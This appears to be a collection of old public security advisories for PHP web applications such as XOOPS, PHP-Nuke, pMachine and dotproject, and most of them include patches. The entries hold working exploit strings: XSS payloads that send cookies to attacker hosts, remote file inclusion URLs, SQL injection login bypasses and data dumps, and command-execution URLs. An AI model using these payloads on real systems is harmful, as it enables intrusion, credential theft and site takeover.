BBCode XSS in XOOPS CMS
Informations : ° Language : PHP Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked) Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°° This hole can be used in modules : - Private Messages - News - NewBB (forum) class/module/textsanitizer.php : --- [...] function xoopsCodeDecode($text){ $patterns = array(); $replacements = array(); [...] $patterns[] = /\[color=(['\]?)([^\']*)\\1](.*)\[\/color\]/sU; $replacements[] = span style='color: #\\2;'\\3/span; $patterns[] = /\[size=(['\]?)([^\']*)\\1](.*)\[\/size\]/sU; $replacements[] = span style='font-size: \\2;'\\3/span; $patterns[] = /\[font=(['\]?)([^\']*)\\1](.*)\[\/font\]/sU; $replacements[] = span style='font-family: \\2;'\\3/span; [...] $text = preg_replace($patterns, $replacements, $text); [...] return $text; } [...] function oopsHtmlSpecialChars($text) { $text = htmlspecialchars($text); $text = str_replace(',',$text); return $text; } [...] --- Exploit : °°° - [color=FF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color] [size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size] [font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font] - function url() from style tag (css) and vbscript are used here to redirect to the url abcdef + the cookie with the bbcode tags [color] [size] and [font]. Another style function that could be used is expression(). Patch : °° Just download the las version of XOOPS (2.0.3). [EMAIL PROTECTED] http://www.phpsecure.info _
pMachine (PHP) : Include() Security Hole
Informations : ° Language : PHP Version : Free 2.2.1 Website : http://www.pmachine.com Problem : Include() Security Hole PHP Code/Location : °°° This will work if register_globals is ON *OR* OFF. /pm/lib.inc.php : - if (isset($HTTP_COOKIE_VARS)) { while(list($var,$val)=each($HTTP_COOKIE_VARS)) { $$var=$val; } } if (isset($HTTP_GET_VARS)) { while(list($var,$val)=each($HTTP_GET_VARS)) { $$var=$val; } } if (isset($HTTP_POST_VARS)) { while(list($var,$val)=each($HTTP_POST_VARS)) { $$var=$val; } } if (isset($HTTP_SERVER_VARS)) { while(list($var,$val)=each($HTTP_SERVER_VARS)) { $$var=$val; } } include ({$pm_path}config$sfx); if ($debug == 1) error_reporting(E_ALL); else error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); include ({$pm_path}db/db.$database$sfx); include ({$pm_path}db/db.tables$sfx); include ({$pm_path}lib/pmcode.fns$sfx); include ({$pm_path}lib/archives.fns$sfx); include ({$pm_path}lib/benchmark.class$sfx); include ({$pm_path}lib/birthday.fns$sfx); include ({$pm_path}lib/calendar.fns$sfx); include ({$pm_path}lib/category.fns$sfx); include ({$pm_path}lib/censor.fns$sfx); include ({$pm_path}lib/comment.fns$sfx); include ({$pm_path}lib/deprecated.fns$sfx); include ({$pm_path}lib/email.fns$sfx); include ({$pm_path}lib/encoded.email$sfx); include ({$pm_path}lib/forum.fns$sfx); include ({$pm_path}lib/hitcounter.fns$sfx); include ({$pm_path}lib/hittracking.fns$sfx); include ({$pm_path}lib/ip.fns$sfx); include ({$pm_path}lib/linking.fns$sfx); include ({$pm_path}lib/mailinglist.fns$sfx); include ({$pm_path}lib/member.fns$sfx); include ({$pm_path}lib/memberfiles$sfx); include ({$pm_path}lib/message.fns$sfx); include ({$pm_path}lib/minicalendar.fns$sfx); include ({$pm_path}lib/password.fns$sfx); include ({$pm_path}lib/pblock.fns$sfx); include ({$pm_path}lib/search.fns$sfx); include ({$pm_path}lib/shared.fns$sfx); include ({$pm_path}lib/stats.fns$sfx); include ({$pm_path}lib/tellafriend.fns$sfx); include ({$pm_path}lib/timelock.fns$sfx); include ({$pm_path}lib/weblog.fns$sfx); include ({$pm_path}cp/xmlparser$sfx); include ({$pm_path}cp/rss.cp$sfx); include ({$pm_path}xmlrpc/ping.fns$sfx); include ({$pm_path}xmlrpc/xmlrpc.inc); - Exploit : °°° http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/sfx=.txt with : http://[attacker]/config.txt or http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/sfx=/badcode.txt with : http://[attacker]/config/badcode.txt etc... Patch : °°° A patch can be found on http://www.phpsecure.info. More Details In French : °° http://www.frog-man.org/tutos/pMachineFree2.2.1.txt _
Re: PHP-Nuke block-Forums.php subject vulnerabilities
I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or , like this : lt;name=alt;input type=hidden name=u value=http://www.attacker.com/prova.phplt;/form lt;scriptwindow.open(document.a.u.value+document.cookie)lt;/script What do you think about : $title2 = htmlspecialchars($title2, ENT_QUOTES); From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: PHP-Nuke block-Forums.php subject vulnerabilities Date: 31 Mar 2003 11:15:54 - The block-Forums.php file have a vuln if an attacker insert a malformatted subject to a topic of Splatt Forum. A type of subject is: lt;scriptgt;alert('bug');lt;/scriptgt; The 'alt' tag is closed by and the other text is normal html. This bug is very bad if a subject is: lt;scriptgt;window.open('www.attacker.com/prova.php?cookie='+document.cookie);lt;/scriptgt; And prova.php register cokkies in a file. The solution: Add under $title2 = stripslashes($title2); line, this line: $title2 = addslashes($title2); And now, backward any there is a backslash! -- [EMAIL PROTECTED] http://www.phpsecure.info _
PHP-Nuke 6.0 6.5RC2 SQL Injection Again
Informations : °° Language : PHP Website : http://www.phpnuke.org Version : 6.0 6.5 RC2 Modules : Forums, Private_Messages Problem : SQL Injection PHP Code/Location : °°° /modules/Forums/viewtopic.php : $sql = SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'; /modules/Forums/viewforum.php : $sql = SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name, u.uname, u.uid,m.forum_id,m.user_id FROM ${prefix}_forums f, .$user_prefix._users u, ${prefix}_forum_mods m WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id = u.uid; /modules/Forums/reply.php : $sql = SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum'); /modules/Forums/newtopic.php : $sql = SELECT forum_type, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum'); /modules/Forums/editpost.php : $sql = SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'; /modules/Private_Messages/reply.php : if ($reply || $send) { if ($uname != ) { $res = sql_num_rows(sql_query(select * from .$user_prefix._users where uname='$uname', $dbi), $dbi); Exploits : °° - This will save forums informations into a txt file : http://[target]/modules.php?op=modloadname=Forumsfile=viewtopictopic=1forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt http://[target]/modules.php?op=modloadname=Forumsfile=viewforumforum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/* http://[target]/modules.php?op=modloadname=Forumsfile=replyforum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/* http://[target]/modules.php?op=modloadname=Forumsfile=newtopicforum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/* http://[target]/modules.php?op=modloadname=Forumsfile=editpostforum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt etc... - This will save all users informations into a txt file : http://[target]/modules.php?name=Private_Messagesfile=replysend=1uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt Patch : °°° A patch can be found on http://www.phpsecure.info More Details In French : http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt [EMAIL PROTECTED] _ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
PHP-Nuke 6.0 ( 6.5?) : Serious SQL Injection Security Holes
Informations : °° Language : PHP Website : http://www.phpnuke.org Versions : 6.0 ( 6.5?) Modules : Members_List, Your_Account Problem : SQL Injection PHP Configuration : This will work if magic_quotes_gpc=OFF. PHP Code/Location : °°° /modules/Members_List/index.php : [...] $count = SELECT COUNT(uid) AS total FROM .$user_prefix._users ; $select = select uid, name, uname, femail, url from .$user_prefix._users ; $where = where uname != 'Anonymous' ; if ( ( $letter != Other ) AND ( $letter != All ) ) { $where .= AND uname like '.$letter.%' ; } else if ( ( $letter == Other ) AND ( $letter != All ) ) { $where .= AND uname REGEXP \^\[1-9]\ ; } else { $where .= ; } $sort = order by $sortby; $limit = ASC LIMIT .$min., .$max; $count_result = sql_query($count.$where, $dbi); $num_rows_per_order = mysql_result($count_result,0,0); $result = sql_query($select.$where.$sort.$limit, $dbi) or die(); echo br; if ( $letter != front ) { echo table width=\100%\ border=\0\ cellspacing=\1\tr\n; echo td BGCOLOR=\$bgcolor4\ align=\center\font color=\$textcolor2\b._NICKNAME./b/font/td\n; echo td BGCOLOR=\$bgcolor4\ align=\center\font color=\$textcolor2\b._REALNAME./b/font/td\n; echo td BGCOLOR=\$bgcolor4\ align=\center\font color=\$textcolor2\b._EMAIL./b/font/td\n; echo td BGCOLOR=\$bgcolor4\ align=\center\font color=\$textcolor2\b._URL./b/font/td\n; $cols = 4; [...] /modules/Your_Account/index.php : switch($op) { [...] case mailpasswd: mail_password($uname, $code); break; case userinfo: userinfo($uname, $bypass, $hid, $url); break; case login: login($uname, $pass); break; [...] case saveuser: saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter); break; [...] case savehome: savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson); break; case savetheme: savetheme($uid, $theme); break; [...] case savecomm: savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax); break; [...] } /modules/Your_Account/index.php : [...] function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) { global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name; cookiedecode($user); $check = $cookie[1]; $check2 = $cookie[2]; $result = sql_query(select uid, pass from .$user_prefix._users where uname='$check', $dbi); list($vuid, $ccpass) = sql_fetch_row($result, $dbi); if (($uid == $vuid) AND ($check2 == $ccpass)) { if (!eregi(http://;, $url)) { $url = http://$url;; } if ((isset($pass)) ($pass != $vpass)) { echo center._PASSDIFFERENT./center; } elseif (($pass != ) (strlen($pass) $minpass)) { echo center._YOUPASSMUSTBE. b$minpass/b ._CHARLONG./center; } else { if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); } if ($pass != ) { cookiedecode($user); sql_query(LOCK TABLES .$user_prefix._users WRITE, $dbi); $pass = md5($pass); sql_query(update .$user_prefix._users set name='$realname', email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' , user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', newsletter='$newsletter' where uid='$uid', $dbi); $result = sql_query(select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from .$user_prefix._users where uname='$uname' and pass='$pass', $dbi); if(sql_num_rows($result, $dbi)==1) { $userinfo = sql_fetch_array($result, $dbi); docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]); } else { echo center._SOMETHINGWRONG./centerbr; } sql_query(UNLOCK TABLES, $dbi); } else { sql_query(update .$user_prefix._users set name='$realname', email='$email', femail='$femail', url='$url', bio='$bio',
GTcatalog (PHP)
Informations : °° Version : 0.9 Website : http://www.geektweaked.com Problem : - Informations Disclosure (Admin Password) - File Including PHP Code/Location : °°° password.inc : ? $globalpw = [PASSWORD]; ? index.php : [...] switch ($function) { case custom: $cc = new Template(); $cc-set_file(head,$dir_base.$dir_template.header.inc); $cc-set_var(array( 'clientcode' = $cfg_clientcode, 'title' = $cfg_title. - .$custom)); $cc-parse(output,head); $cc-p(output); include($custom..custom.inc); include ($dir_base.$dir_template.footer.inc); break; [...] Exploits : °° - http://[target]/password.inc - http://[target]/index.php?function=customcustom=http://[attacker]/1 with : http://[attacker]/1.custom.inc Patch : °°° A patch can be found on http://www.phpsecure.info (- New Version !! :)) More Details : °° In French : http://www.frog-man.org/tutos/GTcatalog.txt [EMAIL PROTECTED] _ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
Invision Power Board (PHP)
Informations : °° Website : http://www.invisionboard.com -- Version : 1.0.1 Problem : phpinfo() -- Version : 1.1.1 Problem : File Including PHP Code/Location : °°° v1.0.1 : phpinfo.php : -- ?php phpinfo(); ? -- v1.1.1 : ipchat.php : - require $root_path.conf_global.php; - (this is a hole if register_globals=ON) Exploits : °° v1.0.1 : http://[target]/phpinfo.php v1.1.1 : http://[target]/ipchat.php?root_path=http://[attacker]/ with : http://[attacker]/conf_global.php Patchs : Patchs for both versions has been published on http://www.phpsecure.org . More Details : °° In French : http://www.frog-man.org/tutos/InvisionPowerBoard.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools [EMAIL PROTECTED] _ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
Myguestbook (PHP)
Informations : °° Version : 3.0 Website : http://www.tefonline.net/ Problems : - XSS - admin infos recovery - Access to admin pages PHP Code/Location : °°° If pseudo = [SCRIPT], e-mail = [SCRIPT] or message = /textarea[SCRIPT] [SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php . /admin/confirm_connect.php : - SetCookie(Myguestbook,$name:$password); - /admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php : ? if(!isset($Myguestbook)) header(location:../index.php?MSG=permis); ? Exploits : °° [SCRIPT] : script location='http://[attacker]/file.php?'+document.cookie; /script http://[target]/admin/admin_index.php?Myguestbook=1 http://[target]/admin/admin_pass.php?Myguestbook=1 http://[target]/admin/admin_modif.php?Myguestbook=1 http://[target]/admin/admin_suppr.php?Myguestbook=1 http://[target]/admin/user_modif.php?id=[MESSAGEID] Solution : °° A patch can be found on http://www.phpsecure.org. More Details : °° In French : http://www.frog-man.org/tutos/Myguestbook.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools [EMAIL PROTECTED] _
php-Board (php)
Informations : °° Website : http://www.hp-planet.de Version : 1 Problem : Informations disclosure PHP Code/Location : °°° login.php : - function passwd2($user) { $password=nicht registriert; if (file_exists(user/.$user..txt)) { $fp = fopen(user/.$user..txt,r); $data = fgetcsv($fp,1,#); fclose($fp); $password=$data[0]; } return($password); } - Exploit : ° http://[target]/user/[NICKNAME].txt More details : °° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txtlangpair=fr%7Cenhl=frie=ISO-8859-1prev=%2Flanguage_tools frog-m@n http://www.phpsecure.org _
DotBr (PHP)
Informations : °° Website : http://dotbr.org Version : 0.1 Problems : - phpinfo() - Informations disclosure - System commands execution PHP Code/Location : °°° foo.php3 : - ? phpinfo(); ? - config.inc : - SQL password - SQL host - SQL username - SQL DB name admin/exec.php3 : --- html body pre ? if (!isset($sep)) { $sep = _; } $cmd=str_replace($sep, ,$cmd); passthru($cmd,$ret); echo $ret; ? /pre /body /html --- admin/system.php3 : --- html body pre ? $cmd = str_replace(_, ,$cmd); system($cmd,$result); echo \n result == . $result . \n; ? /pre /body /html --- Exploits : °° http://[target]/foo.php3 http://[target]/config.inc http://[target]/admin/exec.php3?cmd=[COMMAND] http://[target]/admin/system.php3?cmd=[COMMAND] More Details : °° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txtlangpair=fr%7Cenhl=frie=ISO-8859-1prev=%2Flanguage_tools frog-m@n http://www.phpsecure.org _
D-Forum (PHP)
Informations : °° Website : http://www.adalis.fr/adalis.html Versions : 1.00 - 1.11 Problem : Include file PHP Code/Location : °°° /includes/header.php3 : --- ?php if ($my_header!=) { include ($my_header); } else { ? ... -- /includes/footer.php3 : --- ... if ($my_footer!=) { include ($my_footer); } else { ? ... --- Exploits : °° http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt or http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt with http://[attacker]/script.txt Patch : °°° A patch can be found on http://www.phpsecure.info . More details : °° (in French) http://www.frog-man.org/tutos/5holes8.txt frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
phpMyShop (php)
Informations : °° Version : 1.00 Website : http://www.pc-encheres.com Problem : SQL Injection PHP Code/Location : °°° compte.php : --- ? session_start(); if (isset($achat)) { session_register(achat); } else { header(location:index.php); } include(design/header.php); require(config.php); require(fonction.php); echotd bgcolor=\$barre1\font color=\$police3\ size=\$width_police2\strongIdentification/strong/font/td /tr tr tdbr; if (isset($valider)) { $sql = SELECT id_cli,login_cli,pass_cli FROM $table_client where login_cli='$identifiant' and pass_cli='$password'; $sql = mysql_db_query($base,$sql); $test = mysql_num_rows($sql); if ($test==0) { ? script language=javascript alert(Identifiant ou mot de passe non valide!); /script ? echocenterstrongIdentifiant ou mot de passe non valide!/strong/centerbr; } else { $id_membre = mysql_result($sql,0,id_cli); session_register(id_membre); ? script language=javascript document.location.href=valide.php /script ? } } [...] --- Exploit : ° http://[target]/compte.php?achat=1valider=1identifiant='%20OR%20''='password='%20OR%20''=' Solution : °° A patch has been published on http://www.phpsecure.info . More details : °° In French : http://www.frog-man.org/tutos/phpmyshop.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
myphpPagetool (php)
Informations : °° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9.php : ?php include ($ptinclude . /pt_config.inc); [...] Exploit : ° http://[target]/doc/admin/index.php?ptinclude=http://[attacker] with : http://[attacker]/pt_config.inc (if registers_global=ON) Solution : °° A patch has been published on http://www.phpsecure.info . More details : °° In French : http://www.frog-man.org/tutos/myphpPagetool.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
Re: dotproject Remote Code Execution Vulnerability : Patch
A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=dl=us (english version) . From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: dotproject Remote Code Execution Vulnerability Date: Wed, 29 Jan 2003 04:02:24 -0800 dotproject Remote Code Execution Vulnerability (By Mindwarper) --- --- -- Vendor Information: -- Homepage : http://www.dotproject.net Vendor : informed Mailed advisory: 28/01/03 Vender Response : None -- Affected Versions: -- dev20030121 -- Vulnerability: -- dotproject is a PHP+MySQL beta level web based project management and tracking tool that dotmarketing started in Dec. 2000. Inside the directory /modules/ multiple files try to include classdefs/date.php without defining $root_dir first and allow remote attackers to inject their own servers if globals are set on. Example Code from modules/projects/addedit.php: ** ?php ## ## Files modules: index page re-usable sub-table ## require_once( $root_dir/classdefs/date.php ); $df = $AppUI-getPref('SHDATEFORMAT'); $tf = $AppUI-getPref('TIMEFORMAT'); ** As you can see nothing happens before the require_once function is called and therefore with globals set on an attacker may include remote files. Example: http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker this works also on http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker -- Solution: -- Please check the vendor's website for new patches. As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /modules/ directory and that should block remote users from accessing it. -- Contact: -- Name: Mindwarper Email: [EMAIL PROTECTED] Website: http://mindlock.bestweb.net --- --- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliatel=427 _
Re: Zorum Portal (PHP)
A patch has been created for this hole and can be found on http://www.phpsecure.org/. From: MGhz [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 - Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: - include.php - PHP Code: - [...] include($gorumDir/generformlib_multipleselection.php); include($gorumDir/generformlib_groupselection.php); include($gorumDir/generformlib_filebutton.php); include($gorumDir/group.php); [...] - Exploit : - http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ -- include http://[attacker]/group.php on remote server - -- [EMAIL PROTECTED] _
MyRoom (PHP)
Informations : °° Website : http://www.plansbiz.net Version : 3.5 GOLD Problems : File copy/upload PHP Code/Location : °°° room/save_item.php : if($name == OR $ref == ){ echo You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !; echo br; echo a href='$main_file?show=additem'Try Agains [ Click Here ]/a; exit; } if($photo!=none AND $photo!=application/octet-stream){ //get type of file $filetype=$photo_type; //get lenght of image type $filelenght=strlen($filetype); //get part of file image to build image extension $pos=strpos($filetype,/)+1; //build extension of image $fileextention=substr($filetype,$pos,$filelenght); if($fileextention==pjpeg){ $fileextention=jpg; } $image=date(YmdHis); $image.=..$fileextention; $imgpath = $imgroot; //if image exist, upload it in correct dir if($photovnone) { if(!copy($photo,$imgpath/$image)) { //display errors $msg=brfont color='text00'File Not Uploaded, it might be too large or does not exist..brPlease Try Again!/font; break; } //or finish else { dbconnect(); $sql= INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'; mysql_query($sql) or die(mysql_error()); echo meta http-equiv='refresh' content='0;URL= $main_file?show=additemm=1i=$name'; echo brYour File Was Uploaded Sucessful!! brbra href='$main_file?show=additemm=1i=$name'Loading ../a; } } Exploits : °° http://[target]/room/save_item.php?name=[NAME]ref=hackedphoto=../inc/conf.phpphoto_type=ttxt + http://[target]/room/index.php?show=searchsearch=it_nameitem=[NAME] to find the url of the txt file in wich is conf.php. Patch : °°° A patch can be found on http://www.phpsecure.info (english version available) . More Details : °° In French : http://www.frog-man.org/tutos/MyRoom.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
phpPass (PHP)
Informations : °° Version : 2 Website : http://www.agames-net.com Problem : SQL Injection PHP Code/Location : °°° accesscontrol.php : [...] session_register(uid); session_register(pwd); [...] $sql = SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'; $result = mysql_query($sql); [...] if (mysql_num_rows($result) == 0) { session_unregister(uid); session_unregister(pwd); ? html head title Access Denied /title [...] exit; [...] Exploit : ° http://[target]/protectedpage.php?uid='%20OR%20''='pwd='%20OR%20''=' Patch : °°° In accesscontrol.php, replace the lines : - $sql = SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'; $result = mysql_query($sql); by : $uid=addslashes($uid); $pwd=addslashes($pwd); $sql = SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'; $result = mysql_query($sql); A patch can be found on http://www.phpsecure.org . More details : °° In French : http://www.frog-man.org/tutos/phpPass.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
vSignup, vAuthenticate (PHP)
Informations : °° --- Product : vAuthenticate Version : 2.8 --- Product : vSignup Version : 2.1 --- Website : http://www.beanbug.net Problem : SQL Injection PHP Code/Location : °°° chgpwd.php : --- ? if (!class_exists(auth)) { include (auth.php); } include (authconfig.php); include (check.php); ? --- admin/index.php : -- ? if (!class_exists(auth)) { include (../auth.php); } include (../authconfig.php); include (../check.php); if ($check[level] != 1) { -- check.php : ? $CheckSecurity = new auth(); $check = $CheckSecurity-page_check($USERNAME, $PASSWORD); if ($check == false) { // Feel free to change the error message below. Just make sure you put a \ before // any double quote. print font face=\Arial, Helvetica, sans-serif\ size=\5\ color=\#FF\; print bIllegal Access/b; print /fontbr; print font face=\Verdana, Arial, Helvetica, sans-serif\ size=\2\ color=\#00\; print bYou do not have permission to view this page./b/font; exit; // End program execution. This will disable continuation of processing the rest of the page. } ? auth.php : function page_check($username, $password) { $query = SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status 'inactive'; $connection = mysql_connect($this-HOST, $this-USERNAME, $this-PASSWORD); // OLD CODE - DO NOT REMOVE // $result = mysql_db_query($this-DBNAME, $query); // REVISED CODE $SelectedDB = mysql_select_db($this-DBNAME); $result = mysql_query($query); $numrows = mysql_num_rows($result); $row = mysql_fetch_array($result); // CHECK IF THERE ARE RESULTS // Logic: If the number of rows of the resulting recordset is 0, that means that no // match was found. Meaning, wrong username-password combination. if ($numrows == 0) { return false; } else { return $row; } } // End: function page_check Exploits : °° http://[target]/chgpwd.php?USERNAME=[username]PASSWORD='%20OR%20''=' http://[target]/admin/index.php?USERNAME='%20OR%20''='PASSWORD='%20OR%201=1%20AND%20level='1 Patchs : A patch can be found on http://www.phpsecure.org. More details : °° In French : http://www.frog-man.org/tutos/vAuth-Signup.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
E-theni (PHP)
Informations : °° Version : ? Website : http://www.theni.freesurf.fr Problems : - Include file - phpinfo() PHP Code/Location : °°° /admin_t/include/aff_liste_langue.php : - require ($rep_include.para_langue.php); - /admin_t/include/find_theni_home.php : -- html body ? phpinfo(); ? /body/html -- Exploits : °° - http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/ with : http://[attacker]/para_langue.php (This will work only if register_globals=ON) - http://[target]/admin_t/include/find_theni_home.php Patchs : In admin_t/include/aff_liste_langue.php, replace the line : - require ($rep_include.para_langue.php); - by : - if (file_exists($rep_include.para_langue.php)){ require ($rep_include.para_langue.php); } - To replace the file /admin_t/include/find_theni_home.php by : -- ? session_start(); if (session_is_registered(USER)==FALSE or $USER[id_user]1){ exit; } else { echo html; echo body; phpinfo(); echo /body/html; } ? -- A patch can be found on http://www.phpsecure.org. More details : °° In French : http://www.frog-man.org/tutos/E-theni.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
OpenTopic security hole
Informations : °° Product : OpenTopic Website : http://www.infopop.com Version : 2.3.1 Problem : XSS (script injection) - Cookies recovery Location/Exploit : °° The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ). XSS to get cookie : [IMG]http://[website]/img.gifwidth=750height=750onmouseover=a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG] More details about XSS : In French : http://www.phpsecure.org/article/XSS.php Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.phplangpair=fr%7Cenhl=enie=ASCIIoe=ASCII frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
N/X (PHP)
